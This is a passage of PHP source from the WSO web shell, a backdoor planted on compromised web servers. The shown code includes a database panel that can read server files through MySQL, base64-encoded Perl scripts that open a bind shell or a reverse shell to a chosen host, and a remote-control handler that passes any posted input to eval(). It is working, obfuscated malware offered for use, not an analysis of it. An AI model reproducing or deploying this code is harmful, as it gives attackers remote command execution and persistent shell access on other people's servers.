1904 $line = 2;
1905 }
1906 echo '<tr class="l'.$line.'">';
1907 $line = $line==1?2:1;
1908 foreach($item as $key => $value) {
1909 if($value == null)
1910 echo '<td><i>null</i></td>';
1911 else
1912 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1913 }
1914 echo '</tr>';
1915 }
1916 echo '</table>';
1917 } else {
1918 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1919 }
1920 }
1921 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1922 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1923 echo htmlspecialchars($_POST['p2']);
1924 echo "</textarea><br/><input type=submit value='Execute'>";
1925 echo "</td></tr>";
1926 }
1927 echo "</table></form><br/>";
1928 if($_POST['type']=='mysql') {
1929 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1930 if($db->fetch())
1931 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1932 }
1933 if(@$_POST['p1'] == 'loadfile') {
1934 $file = $db->loadFile($_POST['p2']);
1935 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1936 }
1937 } else {
1938 echo htmlspecialchars($db->error());
1939 }
1940 echo '</div>';
1941 wsoFooter();
1942}
1943function actionNetwork() {
1944 wsoHeader();
1945 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1946 echo "<h1>Network tools</h1><div class=content>
1947
1948 <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
1949 <span>Bind port to /bin/sh [perl]</span><br/>
1950 Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1951 </form>
1952 <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
1953 <span>Back-connect [perl]</span><br/>
1954 Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1955
1956 </form><br>";
1957 if(isset($_POST['p1'])) {
1958 function cf($f,$t) {
1959 $w = @fopen($f,"w") or @function_exists('file_put_contents');
1960 if($w){
1961 @fwrite($w,@base64_decode($t));
1962 @fclose($w);
1963 }
1964 }
1965 if($_POST['p1'] == 'bpp') {
1966 cf("/tmp/bp.pl",$bind_port_p);
1967 $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
1968 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
1969 unlink("/tmp/bp.pl");
1970 }
1971 if($_POST['p1'] == 'bcp') {
1972 cf("/tmp/bc.pl",$back_connect_p);
1973 $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
1974 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
1975 unlink("/tmp/bc.pl");
1976 }
1977 }
1978 echo '</div>';
1979 wsoFooter();
1980}
1981function actionRC() {
1982 if(!@$_POST['p1']) {
1983 $a = array(
1984 "uname" => php_uname(),
1985 "php_version" => phpversion(),
1986 "wso_version" => WSO_VERSION,
1987 "safemode" => @ini_get('safe_mode')
1988 );
1989 echo serialize($a);
1990 } else {
1991 eval($_POST['p1']);
1992 }
1993}
1994if( empty($_POST['a']) )
1995 if(isset($default_action) && function_exists('action' . $default_action))
1996 $_POST['a'] = $default_action;
1997 else
1998 $_POST['a'] = 'SecInfo';
1999if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
2000 call_user_func('action' . $_POST['a']);
2001function FetchURL($url) {
2002 $ch = curl_init();
2003 curl_setopt($ch, CURLOPT_USERAGENT, "$cheader");
2004 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2005 curl_setopt($ch, CURLOPT_HEADER, false);
2006 curl_setopt($ch, CURLOPT_URL, $url);
2007 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2008 curl_setopt($ch, CURLOPT_TIMEOUT, 30);
2009 $data = curl_exec($ch);
2010 if(!$data) {
2011 return false;
2012 }
2013 return $data;
2014 }
2015exit;
2016?>